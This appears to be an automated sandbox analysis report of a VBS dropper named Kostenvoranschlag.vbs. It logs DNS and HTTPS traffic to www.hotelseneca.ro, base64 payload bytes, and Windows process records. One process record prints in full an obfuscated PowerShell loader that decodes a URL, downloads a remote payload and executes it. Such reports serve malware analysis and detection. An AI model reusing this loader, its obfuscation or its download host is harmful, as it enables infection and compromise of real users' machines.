                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Oct 24, 2024 15:20:02.173819065 CEST192.168.2.71.1.1.10x73f7Standard query (0)Horm5zl_6637.6637.6637.657eA (IP address)IN (0x0001)false
                                          Oct 24, 2024 15:20:06.272562027 CEST192.168.2.71.1.1.10xcf4aStandard query (0)www.hotelseneca.roA (IP address)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Oct 24, 2024 15:20:02.189188004 CEST1.1.1.1192.168.2.70x73f7Name error (3)Horm5zl_6637.6637.6637.657enonenoneA (IP address)IN (0x0001)false
                                          Oct 24, 2024 15:20:06.430505037 CEST1.1.1.1192.168.2.70xcf4aNo error (0)www.hotelseneca.rohotelseneca.roCNAME (Canonical name)IN (0x0001)false
                                          Oct 24, 2024 15:20:06.430505037 CEST1.1.1.1192.168.2.70xcf4aNo error (0)hotelseneca.ro185.181.240.15A (IP address)IN (0x0001)false

                                          HTTP Request Dependency Graph

                                          • www.hotelseneca.ro

                                          HTTPS Proxied Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.749700185.181.240.154437400C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          TimestampBytes transferredDirectionData
                                          2024-10-24 13:20:07 UTC179OUTGET /Perspectivist.snp HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                          Host: www.hotelseneca.ro
                                          Connection: Keep-Alive
                                          2024-10-24 13:20:07 UTC478INHTTP/1.1 200 OK
                                          Connection: close
                                          cache-control: public, max-age=0
                                          expires: Thu, 24 Oct 2024 13:20:07 GMT
                                          content-type: application/octet-stream
                                          last-modified: Thu, 24 Oct 2024 10:17:29 GMT
                                          accept-ranges: bytes
                                          content-length: 475360
                                          date: Thu, 24 Oct 2024 13:20:07 GMT
                                          server: LiteSpeed
                                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                          2024-10-24 13:20:07 UTC16384INData Raw: 63 51 47 62 63 51 47 62 75 39 76 38 43 67 42 78 41 5a 74 78 41 5a 73 44 58 43 51 45 63 51 47 62 36 77 4a 47 74 4c 6c 4b 39 65 54 6e 36 77 4b 30 37 33 45 42 6d 34 48 78 33 6e 71 70 68 48 45 42 6d 2b 73 43 59 77 69 42 38 5a 53 50 54 57 50 72 41 70 2f 38 36 77 4a 72 55 2b 73 43 46 52 4c 72 41 75 73 6d 75 6f 31 62 4a 43 68 78 41 5a 76 72 41 76 4f 58 63 51 47 62 63 51 47 62 4d 63 72 72 41 72 71 51 63 51 47 62 69 52 51 4c 63 51 47 62 36 77 4b 35 6d 64 48 69 63 51 47 62 36 77 4c 54 57 34 50 42 42 4f 73 43 33 72 31 78 41 5a 75 42 2b 65 56 56 35 77 46 38 7a 48 45 42 6d 2b 73 43 36 48 57 4c 52 43 51 45 63 51 47 62 36 77 4c 66 4c 49 6e 44 36 77 4c 53 68 4f 73 43 41 71 71 42 77 36 79 64 76 41 48 72 41 72 46 61 63 51 47 62 75 6d 39 76 6c 46 64 78 41 5a 76 72 41 6a 35
                                          Data Ascii: cQGbcQGbu9v8CgBxAZtxAZsDXCQEcQGb6wJGtLlK9eTn6wK073EBm4Hx3nqphHEBm+sCYwiB8ZSPTWPrAp/86wJrU+sCFRLrAusmuo1bJChxAZvrAvOXcQGbcQGbMcrrArqQcQGbiRQLcQGb6wK5mdHicQGb6wLTW4PBBOsC3r1xAZuB+eVV5wF8zHEBm+sC6HWLRCQEcQGb6wLfLInD6wLShOsCAqqBw6ydvAHrArFacQGbum9vlFdxAZvrAj5
                                          2024-10-24 13:20:07 UTC16384INData Raw: 55 30 74 74 46 56 44 74 48 50 7a 57 50 76 6d 32 4a 68 76 44 79 76 53 4c 74 41 6d 35 6f 37 39 50 35 73 41 7a 4d 73 6a 4f 6a 43 39 30 75 33 51 64 4a 47 74 4a 75 73 73 2f 35 71 70 56 55 78 57 6c 6b 6d 51 56 70 5a 4a 6b 46 61 57 53 5a 42 57 6c 6b 6d 51 56 70 5a 4a 6b 46 61 55 56 4b 4e 41 66 4c 79 66 78 49 2f 30 31 75 57 75 33 44 6e 64 32 53 45 46 74 6a 36 4f 32 52 78 39 52 37 4c 79 71 45 34 36 45 39 37 4a 74 6c 45 2f 76 6d 6d 36 2b 45 35 5a 68 4b 59 33 4d 6c 45 39 54 33 67 66 6d 77 2f 69 63 52 4a 4e 31 69 43 46 4a 46 51 7a 50 4d 7a 50 51 4e 43 52 36 4d 66 61 63 4b 65 56 6c 76 68 6c 35 53 6a 6f 4a 77 36 49 4a 2f 45 34 52 4c 45 4b 51 66 38 73 43 34 6d 4c 6c 50 30 38 73 48 30 51 58 70 5a 4c 74 78 50 51 5a 36 54 57 6e 6b 6d 52 47 48 6a 66 6f 4d 2f 55 54 6c 79 76
                                          Data Ascii: U0ttFVDtHPzWPvm2JhvDyvSLtAm5o79P5sAzMsjOjC90u3QdJGtJuss/5qpVUxWlkmQVpZJkFaWSZBWlkmQVpZJkFaUVKNAfLyfxI/01uWu3Dnd2SEFtj6O2Rx9R7LyqE46E97JtlE/vmm6+E5ZhKY3MlE9T3gfmw/icRJN1iCFJFQzPMzPQNCR6MfacKeVlvhl5SjoJw6IJ/E4RLEKQf8sC4mLlP08sH0QXpZLtxPQZ6TWnkmRGHjfoM/UTlyv
                                          2024-10-24 13:20:08 UTC16384INData Raw: 4e 59 6a 31 36 33 53 65 4c 6f 6c 42 2b 5a 42 6c 79 67 49 73 64 4d 77 7a 71 6f 43 31 45 71 4d 6b 56 61 35 30 34 6d 2f 6c 34 6c 55 31 42 4d 59 6b 56 54 74 7a 46 45 58 6c 30 72 34 46 46 64 49 73 72 63 2f 51 32 71 2f 57 6a 70 46 78 77 65 45 39 68 67 2b 42 37 47 4b 74 33 41 37 66 53 6e 47 37 31 66 7a 36 39 4d 53 7a 47 65 65 67 5a 70 47 67 70 7a 4e 57 57 37 6a 6a 30 69 2b 34 4d 37 57 2f 7a 57 76 53 6e 34 70 6b 46 61 57 53 5a 42 57 6c 6b 6d 51 56 70 5a 4a 6b 46 61 57 53 5a 42 57 6c 6b 6d 51 56 4f 47 65 72 75 30 46 49 65 37 54 56 52 2f 56 44 5a 55 46 70 2f 70 72 59 44 49 4e 39 50 31 73 4b 39 6f 36 4d 64 56 71 54 5a 45 55 64 6f 75 61 7a 69 62 38 7a 69 68 6c 50 55 61 32 56 35 55 67 67 78 45 48 36 64 2f 63 4f 37 66 65 6b 6b 50 6b 73 56 2b 56 32 43 37 54 44 31 69 61
                                          Data Ascii: NYj163SeLolB+ZBlygIsdMwzqoC1EqMkVa504m/l4lU1BMYkVTtzFEXl0r4FFdIsrc/Q2q/WjpFxweE9hg+B7GKt3A7fSnG71fz69MSzGeegZpGgpzNWW7jj0i+4M7W/zWvSn4pkFaWSZBWlkmQVpZJkFaWSZBWlkmQVOGeru0FIe7TVR/VDZUFp/prYDIN9P1sK9o6MdVqTZEUdouazib8zihlPUa2V5UggxEH6d/cO7fekkPksV+V2C7TD1ia
                                          2024-10-24 13:20:08 UTC16384INData Raw: 4e 7a 4b 72 4e 71 70 34 2f 69 52 6b 56 50 6e 51 33 65 58 6a 52 6c 6e 37 4f 53 52 6b 62 52 46 6e 56 75 58 37 69 39 31 58 57 53 79 73 7a 4f 43 6b 30 6e 4b 32 4a 58 2b 79 33 4f 6d 6a 79 35 7a 35 72 6c 4b 2f 6c 5a 66 57 6e 71 4c 50 36 7a 67 62 62 4f 57 64 33 77 4e 37 78 65 66 64 4f 70 52 58 6a 39 58 68 44 73 54 61 73 63 62 68 52 5a 52 4c 6b 66 35 6e 70 52 4f 69 43 57 68 74 75 70 79 62 34 4b 35 41 4a 42 6a 32 68 6f 41 32 4c 58 69 76 48 43 38 69 6d 30 4e 6e 74 58 6b 67 4d 34 65 4a 46 36 45 2b 2f 73 52 74 6c 59 31 79 65 46 76 32 2b 73 65 4b 2f 4a 59 2f 53 2f 59 70 71 6d 32 7a 58 65 58 6d 6f 41 74 50 6f 69 52 68 64 53 43 6d 4b 75 58 6d 54 70 61 56 71 79 52 52 43 51 6d 55 45 2b 30 47 6d 4a 78 73 6e 32 32 48 50 6b 52 63 32 7a 2f 75 45 55 57 79 6b 6a 57 62 71 59 47
                                          Data Ascii: NzKrNqp4/iRkVPnQ3eXjRln7OSRkbRFnVuX7i91XWSyszOCk0nK2JX+y3Omjy5z5rlK/lZfWnqLP6zgbbOWd3wN7xefdOpRXj9XhDsTascbhRZRLkf5npROiCWhtupyb4K5AJBj2hoA2LXivHC8im0NntXkgM4eJF6E+/sRtlY1yeFv2+seK/JY/S/Ypqm2zXeXmoAtPoiRhdSCmKuXmTpaVqyRRCQmUE+0GmJxsn22HPkRc2z/uEUWykjWbqYG
                                          2024-10-24 13:20:08 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                          2024-10-24 13:20:08 UTC16384INData Raw: 6b 6a 32 52 5a 76 54 68 78 4f 52 74 36 62 6d 6b 6b 6d 52 67 55 64 50 67 78 6d 4b 54 38 4b 69 44 7a 2b 55 55 69 5a 2b 42 71 79 53 37 6a 66 6b 78 68 75 44 79 4a 4a 4e 2f 67 49 70 78 6f 35 44 38 6b 47 51 56 35 50 79 56 68 43 51 2f 50 52 65 6c 6b 75 5a 67 6c 7a 7a 68 78 53 51 6e 50 52 65 6c 6b 72 6b 6b 6e 38 50 6c 75 50 79 51 5a 42 58 36 57 2b 43 6e 6e 55 70 64 33 75 52 74 36 55 79 6e 6b 6d 52 67 55 4e 4f 6a 46 45 31 4c 57 74 6b 6b 6b 36 30 35 61 6f 54 6c 4a 4c 32 43 7a 51 30 6b 6b 79 4d 70 39 61 7a 74 69 4a 69 51 5a 42 55 6b 37 79 79 59 4d 35 4a 6b 47 69 47 45 58 52 53 6c 4b 58 46 4d 41 38 33 6c 2f 75 73 36 4e 6a 67 6b 59 57 7a 77 4a 42 6e 6c 2f 6d 37 48 74 71 77 68 55 32 58 4d 4c 67 39 5a 46 36 57 53 6f 78 51 39 48 6b 7a 32 4a 4c 74 66 4e 73 32 38 35 53 54
                                          Data Ascii: kj2RZvThxORt6bmkkmRgUdPgxmKT8KiDz+UUiZ+BqyS7jfkxhuDyJJN/gIpxo5D8kGQV5PyVhCQ/PRelkuZglzzhxSQnPRelkrkkn8PluPyQZBX6W+CnnUpd3uRt6UynkmRgUNOjFE1LWtkkk605aoTlJL2CzQ0kkyMp9aztiJiQZBUk7yyYM5JkGiGEXRSlKXFMA83l/us6NjgkYWzwJBnl/m7HtqwhU2XMLg9ZF6WSoxQ9Hkz2JLtfNs285ST
                                          2024-10-24 13:20:08 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 57 2b 57 67 6c 4a 42 6b 46 56 77 36 61 61 63 6b 46 31 55 58 70 5a 4c 77 2b 36 6e 47 34 4d 78 53 55 47 54 4c 4e 6f 45 6b 36 69 69 6a 5a 68 57 6c 35 35 4e 7a 49 46 67 6b 63 79 42 44 6f 78 57 62 74 7a 64 42 4a 4b 4a 57 50 47 4d 53 34 4e 30
                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgW+WglJBkFVw6aackF1UXpZLw+6nG4MxSUGTLNoEk6iijZhWl55NzIFgkcyBDoxWbtzdBJKJWPGMS4N0
                                          2024-10-24 13:20:08 UTC16384INData Raw: 32 77 4d 67 61 56 36 31 77 4a 43 58 55 35 41 31 78 50 69 63 51 35 74 69 69 4d 4f 72 6b 6d 43 74 35 31 52 41 64 4f 4f 34 38 45 39 72 35 38 6e 48 4d 78 55 4a 36 5a 39 4e 48 2f 30 55 79 52 70 46 4a 63 37 6e 6c 68 61 33 53 35 78 54 50 4a 78 39 77 75 2b 51 49 4a 4e 6b 46 66 59 70 50 43 69 4d 4f 2b 58 6d 70 4e 6e 68 79 43 52 35 64 53 70 47 69 75 58 6d 37 61 53 74 54 76 63 4f 37 66 65 73 69 50 6b 74 5a 75 70 37 5a 30 6b 4b 36 41 6c 73 49 69 56 78 31 63 32 32 52 49 69 59 4d 64 39 67 4f 75 39 66 45 69 78 6e 6d 6f 76 70 75 4a 33 39 46 52 37 67 57 6c 52 37 6c 46 75 5a 2f 71 2b 61 79 46 7a 67 2f 68 76 78 75 61 53 53 5a 4a 78 66 77 4b 68 6c 51 33 4d 68 59 4b 71 77 66 75 38 49 42 2f 6f 4a 32 6f 6f 4c 59 64 75 42 49 52 67 33 68 61 66 4f 4a 7a 75 73 45 70 76 43 4e 57 54
                                          Data Ascii: 2wMgaV61wJCXU5A1xPicQ5tiiMOrkmCt51RAdOO48E9r58nHMxUJ6Z9NH/0UyRpFJc7nlha3S5xTPJx9wu+QIJNkFfYpPCiMO+XmpNnhyCR5dSpGiuXm7aStTvcO7fesiPktZup7Z0kK6AlsIiVx1c22RIiYMd9gOu9fEixnmovpuJ39FR7gWlR7lFuZ/q+ayFzg/hvxuaSSZJxfwKhlQ3MhYKqwfu8IB/oJ2ooLYduBIRg3hafOJzusEpvCNWT
                                          2024-10-24 13:20:08 UTC16384INData Raw: 46 51 52 6e 75 6f 66 67 6a 65 63 78 30 37 6b 51 43 46 59 45 70 34 66 69 37 61 6c 45 2b 6d 74 7a 65 4f 4b 49 72 68 59 58 52 6d 34 78 36 35 42 54 46 79 39 74 37 48 31 67 4b 62 6e 73 4c 31 52 61 48 79 41 58 70 5a 49 52 34 75 52 65 34 39 6f 31 53 78 5a 4b 68 55 6e 71 51 53 62 42 4c 64 68 53 67 49 4c 4c 33 6e 55 45 6e 50 6c 48 31 6f 39 5a 37 65 63 68 65 41 38 30 39 43 4b 2f 66 6c 44 43 45 56 54 36 65 59 51 75 6b 47 2f 33 6e 73 73 75 35 30 53 63 47 43 56 6c 46 61 55 62 71 39 6b 63 51 63 30 6c 38 2b 37 68 70 4a 56 2f 2b 54 35 45 62 66 32 61 4e 34 4b 36 55 62 54 4b 56 45 5a 6c 45 6d 33 58 75 76 4e 34 65 78 42 4b 7a 38 4e 73 58 51 34 44 38 68 6e 5a 6f 71 53 53 5a 42 71 6b 6a 56 67 56 70 5a 4a 6b 46 61 57 53 5a 42 57 6c 6b 6d 51 56 70 5a 4a 6b 46 61 57 53 5a 42 57
                                          Data Ascii: FQRnuofgjecx07kQCFYEp4fi7alE+mtzeOKIrhYXRm4x65BTFy9t7H1gKbnsL1RaHyAXpZIR4uRe49o1SxZKhUnqQSbBLdhSgILL3nUEnPlH1o9Z7echeA809CK/flDCEVT6eYQukG/3nssu50ScGCVlFaUbq9kcQc0l8+7hpJV/+T5Ebf2aN4K6UbTKVEZlEm3XuvN4exBKz8NsXQ4D8hnZoqSSZBqkjVgVpZJkFaWSZBWlkmQVpZJkFaWSZBW
                                          2024-10-24 13:20:08 UTC16384INData Raw: 6e 31 47 59 78 43 53 39 6e 4a 33 78 62 2b 56 57 54 79 49 78 76 32 61 43 77 50 39 74 4e 35 7a 69 70 47 4e 34 6c 78 54 6e 6c 56 73 56 52 43 49 48 79 31 74 44 7a 30 72 54 36 37 76 2f 63 74 79 35 70 6f 42 6f 39 63 71 6a 6b 71 57 61 5a 42 57 6c 6b 6d 51 56 55 57 71 43 72 61 57 53 5a 42 57 6c 6b 6d 51 56 70 5a 4a 6b 46 61 57 53 5a 42 57 6c 6b 6d 51 56 70 5a 4c 35 79 6c 73 4e 4b 31 31 50 4d 38 63 70 61 43 48 42 45 35 54 67 4d 6d 69 64 30 78 70 54 74 5a 47 64 57 76 49 74 51 2b 58 72 43 65 58 69 49 6e 4b 37 6c 53 52 39 48 62 34 53 30 75 58 36 44 39 61 39 7a 79 79 64 41 74 50 48 62 2f 41 35 71 59 47 54 43 32 42 52 66 4d 4b 67 66 69 50 31 69 61 4c 4e 6f 65 37 39 35 4f 34 4c 32 6c 42 59 47 2f 4d 42 61 76 4c 44 58 7a 62 4e 7a 65 32 67 68 4a 42 6b 46 52 74 34 30 67 31
                                          Data Ascii: n1GYxCS9nJ3xb+VWTyIxv2aCwP9tN5zipGN4lxTnlVsVRCIHy1tDz0rT67v/cty5poBo9cqjkqWaZBWlkmQVUWqCraWSZBWlkmQVpZJkFaWSZBWlkmQVpZL5ylsNK11PM8cpaCHBE5TgMmid0xpTtZGdWvItQ+XrCeXiInK7lSR9Hb4S0uX6D9a9zyydAtPHb/A5qYGTC2BRfMKgfiP1iaLNoe795O4L2lBYG/MBavLDXzbNze2ghJBkFRt40g1


                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:09:20:00
                                          Start date:24/10/2024
                                          Path:C:\Windows\System32\wscript.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Kostenvoranschlag.vbs"
                                          Imagebase:0x7ff640950000
                                          File size:170'496 bytes
                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:2
                                          Start time:09:20:01
                                          Start date:24/10/2024
                                          Path:C:\Windows\System32\PING.EXE
                                          Wow64 process (32bit):false
                                          Commandline:ping Horm5zl_6637.6637.6637.657e
                                          Imagebase:0x7ff794b00000
                                          File size:22'528 bytes
                                          MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          General

                                          Target ID:3
                                          Start time:09:20:01
                                          Start date:24/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff75da10000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:4
                                          Start time:09:20:01
                                          Start date:24/10/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Texguino Trave gastnderens Oppustes #>;$Nrtagenhedens='Forgrenedes';<#Samlemappens Slenderization Forepale Kiloers Bulmeurters #>;$Skuldrings11=$Varies+$host.UI; function Blaaklokkers($Kmnings246){If ($Skuldrings11) {$Koalabjrn++;}$Afvundnes=$Maleficium+$Kmnings246.'Length'-$Koalabjrn; for( $Katina=4;$Katina -lt $Afvundnes;$Katina+=5){$Tachytelic=$Katina;$Presartorial+=$Kmnings246[$Katina];$Harpalides='Glaeder';}$Presartorial;}function Fritidsklubberne($Fjernsynsapparat){ . ($Festsale) ($Fjernsynsapparat);}$Mellemstykket=Blaaklokkers 'C mpMUnaboRunbz.awaiComplAzuml RaaaWall/Amal ';$Arkipelagers='De d[ UncNP edEDaabtUn.e.Fjl.SNoncEMiljR Intv PiniE.toCSyllESyntPnervoLyriIafsyNOddet .olMK meaFavnnfra,A RungHabie KnorArga]Ingo:Kr g:AllesW.ipeBemacskftuBl,arSkovi CentUnlaY EstPObseRAriloMussTTrypOPaucCLageOTyp,lKerm Mist= Hy, ';$Mellemstykket+=Blaaklokkers 'Kors5Camb.P ls0Ande Paat( igiWRigsiSjusn InsdPolyo enrwMelosCykl endNOverT nd Gaar1Over0Atro.Mine0Unpr;Cha ,ikkW andiKancnrnne6Ro,e4Re r; K g Pr,xheim6Pawl4Feti; ora G ourCatavuneq:Peri1 Sem3Adve1 Pup.M,na0Aabe) Kli OveGPrd eWoolcSuppk PreoUni./Afma2Bane0 Fej1 ea0Skin0preo1,ros0Damp1Sand Ha FFlavi Sndr Ague DisfGorgoAbstx g n/Mari1 ave3 .al1Frem.gyna0Bes, ';$Arkipelagers+='Hold[StanNGroueA snTAbey.ProtS PrsEoprec inmU TwyrKretienertT anyRewrp SedrSleeoAylitGadeOProtCBaadoVeneLDepoTTtelY.ittpInteeToma] Sla ';$Furthy=Blaaklokkers 'InteU In sS edELunerM un-RemiaSpriGaikiEContN O eT rbe ';$Opvejningerne=Blaaklokkers ' ureh fsotBalltStabpStyls ati:Shet/Anno/,efowbejlw SubwFede.EpishHa doSt,nt OuteKloalOuabs ecie,usknBiseebefrcIndkaVarm. xplr Ai,oFasc/ MulPAv neFamirLyknsReprpStrieSnorcAnsatSnkeiVituv BesiUnu.s EcltHapu.RibbsWienn ybgpUni ';$Vellumy=Blaaklokkers 'Pseu>Adre ';$Festsale=Blaaklokkers 'tingiL rrEMediX,toc ';$Kua='Unfanged';$Arkipelagers+='thor:Unde:KdkrtPaloLRecosEnhe1S bs2 Hom ';$Befjelsernes='\Commandoes.Gre';Fritidsklubberne (Blaaklokkers 'Grav$Du,egTripL ndhoClosbTredARe aLSuff:DassBJuguA .eklOutlA Medr ,udaEli OKonk=vrne$WageeBurfnPr.tvSpri:F rsAshivPFi vpensodfi,aaDermTOtheaRega+ngle$,dspbgangE Ny f IltjGrenEReprL Ch s Fe ED varKnocNRegneL biS Irr ');Fritidsklubberne (Blaaklokkers ' Ci.$ torgSelvLB ddoFiloB indAKjruL Ko.:SucuS ,raaOv,rLLsenmKonceAitkdUdskIDoubg alt ermNBamlImruwN Fu GFormE elR.trasVrte=Rntg$shepOFe tpIlliv UbeEParajUnden AtoI OffnAbj gDespe LadrMononMissEAll . .erSfllePKanolR ali,almtKitt(nonb$BughV inE fr,L inylcageUUr sMVi.jyS nf)Regn ');Fritidsklubberne (Blaaklokkers $Arkipelagers);$Opvejningerne=$Salmedigtningers[0];$Autostandardization=(Blaaklokkers 'Moda$BobfgMuslLL viO omabAwarATes l for: .eisTvinnCommd Blae My rPoemlUn aeKmpem PranSndeiLokaNSt eGTrk,ESt iRDa enHundeBa f=UnheNRaasETeedWUn e-AdepO,edtb LuejSem.eSuppCSkrmtStil BesS PhoYClins Sint C.iEa epm Lyk. PernHar E ksiT A t. dewJgereImbuBLiviCPalelamini stvEBl gNUnaptTa.j ');Fritidsklubberne ($Autostandardization);Fritidsklubberne (Blaaklokkers ' kyd$CarpSHo knUmidd L meSemir Deml L.neM num salnK,lli Undn DemgIofbe NonrSpidnFalseIdio.Wat,HDr keCensaS bdd .sse HolrEtagsS bd[ Vig$ Su FHel uBogsrSuabtRusshUdspyDivi]Kidd= elv$ onoMRefoe BlulBe jlkompeNo dmcestsur tt HemyEverk.ffikAttreLatctRip ');$Miljbeskyttelseskonventioners=Blaaklokkers ',nsh$ O.uSUnden ahad .kaeF itrEnrelDem ePrefmTheanUdsairebunCapigCreme butrhyp.n OveePseu.LsniDSta o PoiwFrihnGhoullokko BlnaLystdKalvF UnbiCh llSickeresp( Kul$IganOTa pp,onev Je.eDolmjSpilnnighi CounAug.gElmueW,amrCas,nDueleSple,Wham$FirraArchn Ka.s YodtUudstKonge .arl .ersMeste NonsByfepZaptl egraMoonn I gsSc m)Ind ';$ansttelsesplans=$Balarao;Fritidsklubberne (Blaaklokkers 'Liba$ KonGT isL NonoJiv BKompA autLVest: arkpHemooOpers WebtBro IPol,L StaLAraeaEmueTUnmoiHeguOGyp NPorg= ig(Split eceEKvlnsDommtPaus-Fi uP MelASusstGadeh Sug P rv$Or hALageN,orsSDvrgtOnduTSheeEWreal Ba,S .taeMoolS Sh,PPsykLSestA RumN cars .um)Ocea ');while (!$Postillation) {Fritidsklubberne (Blaaklokkers 'D ou$FladgUd tlEf eoS ivbstera.lupl ra:P eeMPilie enorEntri EyetI.dio ncirCen iViolosejluPicksTranlquinyBar =Spec$FusetGrafrTek uScoleAlas ') ;Fritidsklubberne $Miljbeskyttelseskonventioners;Fritidsklubberne (Blaaklokkers 'P lySNotiTNeimaallerNaadTUfo,-r stsVandlCamoE V deOranpCard Fo s4Palm ');Fritidsklubberne (Blaaklokkers 'Plan$Stn gUlvel aloBissBl.dyAStanLVerd: ruPDehyOUn esDyscTSebriYvinlUniml BilAHeteT esti IsoOBlinn ep=Tril(Esclt Made EutsU.ictOmel-Ank pWhacaNilaTSkr hFrak lip$Bud ATroln rizsr veTFibrTChasEfrillUners.urgEc rcsFeofPInd LSekoA MilNTekss tto)ser ') ;Fritidsklubberne (Blaaklokkers 'Flan$StraGRentlDadeo ubbsmeraLat LDown:N nvYCo udAfgiE FodrMirslcarbiPl ugInvos pantOpsaESulfsChro=Ae.o$SciegforfLSheaOted bB deA KonlBars:N,agbComeiH drLTovrgSkylG ParEUdkar D snAf keMedl+Fre,+Konk% Kry$TestS SigaUllilUframT alEEcclD isiCorrg.arbT cepnSub iFjumN EdigIsopELophRSu csAsbe.MammCM llOSelvuP ovnBet,TCoug ') ;$Opvejningerne=$Salmedigtningers[$Yderligstes];}$Katinantergraft12=327303;$Klandret=29217;Fritidsklubberne (Blaaklokkers 'Sega$ di.gMalel layO MilbOrdrA.agel ei:F,rtI,jrnlOpd LInteaRootQTeoru,ille SkraStreb ,uaL tete,aar ,oss=Unde StegSt aE antopsl-VrdiC BalOSignnCeraTMesoESon NMa et .pr lec$ ForAButtN Trosbry,t MaeTKrakeTalllUmbrssal Eondus MarpSondLS prA KonNSkabSSubc ');Fritidsklubberne (Blaaklokkers ' sty$Anteg MuclWai.oInd,bMiniaSorel Ske:InteBMaalointrmMammbCa sy Re,cgul iFun.lObjel uteaHjer Pudd= ind East[Pho SOpsayC assSkartqurteTri.mfoto.FedtC MoooServntr.mv Co eDgnpr DmrtSwe ]B si:Fo s:S,rrFChadrMello Clom me.BVrgeaInspsTempeInfr6Data4ShebSProltKaemr.atriNonpnEfteg,ose(Bi o$rekoIMorgl O,fl PreaSp,nq Vrduf,ane SnoaE.spbAalelTe te Sko) kul ');Fritidsklubberne (Blaaklokkers ' e p$Epa gDepelpre,oFashBRnneaEspuLAspe:AlcafSem.iEnorrUncle A vSSem.IBgebdPresE,uri Mini= tri H mi[TyrksSlriY DumSInchtclogeShipM mrt.InteTForkEvarsx LogTS ua.Acrie onnN ,omC AstO OveDIntei hetNBiblGNote]Subp:Paal:SknjACounSAerocMisoIRi eiMe a.TilsgbjereoxidTMistS ChoTFu drKerai PronAm hGShri( je$WiseBPlatoRejimmultB ,teyTegnc,arsiKetaLG,nilLyriAM ho)Arta ');Fritidsklubberne (Blaaklokkers 'Sl e$KhmeGtolvL HanOViadbF.rfa esslSvin: onfpSymby dillFl,coUjvnr b.rO orlUMuttsFern6Stur9 Rai= C u$.panfBoerIM,rbr soleTo.ds erI alad odgeMark.MyelS keU C,tbTrensA ylTMosrr SteImodfN etrgAnti(Form$,arikDde AtreeTAteliinfanC,una VejN BeiTUopse C srDislGDimeRBl taPeleF ndtWhit1Trek2Prea,Vagt$ProcKUndrl GotABuseNhumed couRDr jEMasttPrer)Horr 